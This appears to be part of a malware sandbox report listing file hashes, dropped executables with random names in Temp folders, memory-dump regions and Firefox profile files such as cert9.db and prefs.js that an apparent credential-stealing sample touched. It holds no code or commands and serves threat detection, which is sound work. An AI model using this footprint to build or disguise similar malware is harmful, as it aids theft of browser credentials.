SHA256 fa7bc0dcf96d0524bf2bfceef05f5682f03a10d46c0396e1325b6617906772c3
SHA512 a3925cabb6ec4eddbd28e4b9a555eb3f917f7bb2a29b96456fcc26e4d1dde91f007972f39b2be501798207c87b045b5f94fb87eedde6fa78efd06edd78ac0e7c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

MD5 7924cb8c38f57af46e40d74243debe63
SHA1 e3115390802c80932f72ad5ec5aa0004e7ea6acb
SHA256 814e996603ebcf8c3b75d8a9ac93e0fa19a129bbb02d0543e282d4f98d7e39f2
SHA512 a1989892402c56e08850f0e94aeb0e41ef9a8a550ff2b7746d005887c177793306bbc8ef895f3f948003e003d90d22adae51838dd6f73f60190880a6a674bc8a

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin

MD5 489eac1766c04d398cefd0d26551a988
SHA1 81f3add4214ab19bcca6cc66063682dedf2bf596
SHA256 c7f624ae5781b3a9d4cb566e3ec9504e3520aa5e77a3e1e5a925a2771fbf9ccd
SHA512 86d1db56219b650c91cf859865fb439bf83141e89dc74d5cfcaa36dc94f10f9e82d1622020689d44aff5a93c490dc55abbd6556d9f6aa092ff7354ac30a1bb81

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

MD5 e748e0c8994ad8b0da72973ed0291bd4
SHA1 216606ad1fb1382c589163c31f2793b889f6685d
SHA256 ac9897ceda6ef3dab4410e679086c20e6a744ce43a97fcd7d921ef8e93c7f14d
SHA512 a2d4fff3f119db9dd63f4f19b62b489ed98f20c56567271347f78c802a827d6d58696aee7dce569f1d658383f8ac5b40df3bcd7ec1869193b08144085e639f2a

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2020-979-0x00000000003D0000-0x0000000000871000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

memory/4276-1000-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/3820-1001-0x00000000007B0000-0x0000000000E9E000-memory.dmp

C:\ProgramData\CC69A22766873E3E.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\cert9.db

MD5 f7c6e562ad967ed884393886a94e363f
SHA1 4014007970d8138267462fd8ee069e1b3aebdbaa
SHA256 859d0087d4fdcee697c65a7885be015707bf5f20f00969cc865f805f9defc674
SHA512 6dc896fe7144910ca8d9b212a35e6690d920d85a89400c0d77dc2b9f9d6afbaaeaf7310c06d778aeac41cf351b7eaf1b4c96151469aed6b73825681e7f85eb22

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js

MD5 95272a816555295eb83ffb964ec1f8f5
SHA1 1dbbe86abf4894260c9fd88ed04edbdd94c9fa61
SHA256 e627c2bc12577e1e0ffb6843bf7a865b8e143dd13d3d1a8b90b41da474e90588
SHA512 b36a6dce8999b5c7e67750299b964e2e6d6c8af3326d203244933ecf1fc28b78b0e6de7adae0e82275ad4f6d334522c17046dda7a24fc976860dd0a07cf9a7c9

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/6120-1051-0x0000000000F40000-0x0000000000FA0000-memory.dmp

memory/2504-1055-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2504-1053-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2020-1057-0x00000000003D0000-0x0000000000871000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2104-1075-0x000001F80FF10000-0x000001F80FF22000-memory.dmp

memory/2104-1076-0x000001F8102B0000-0x000001F8102C0000-memory.dmp

memory/4276-1079-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/4484-1098-0x0000000000340000-0x00000000003B0000-memory.dmp

memory/4556-1100-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/628-1105-0x0000000000400000-0x0000000000466000-memory.dmp

memory/628-1103-0x0000000000400000-0x0000000000466000-memory.dmp

memory/628-1107-0x0000000000400000-0x0000000000466000-memory.dmp

memory/628-1109-0x0000000003860000-0x0000000003865000-memory.dmp

memory/628-1108-0x0000000003860000-0x0000000003865000-memory.dmp

memory/4276-1113-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/4488-1127-0x0000000000BC0000-0x000000000105B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/4488-1147-0x0000000000BC0000-0x000000000105B000-memory.dmp

memory/2676-1153-0x0000015279F40000-0x0000015279F62000-memory.dmp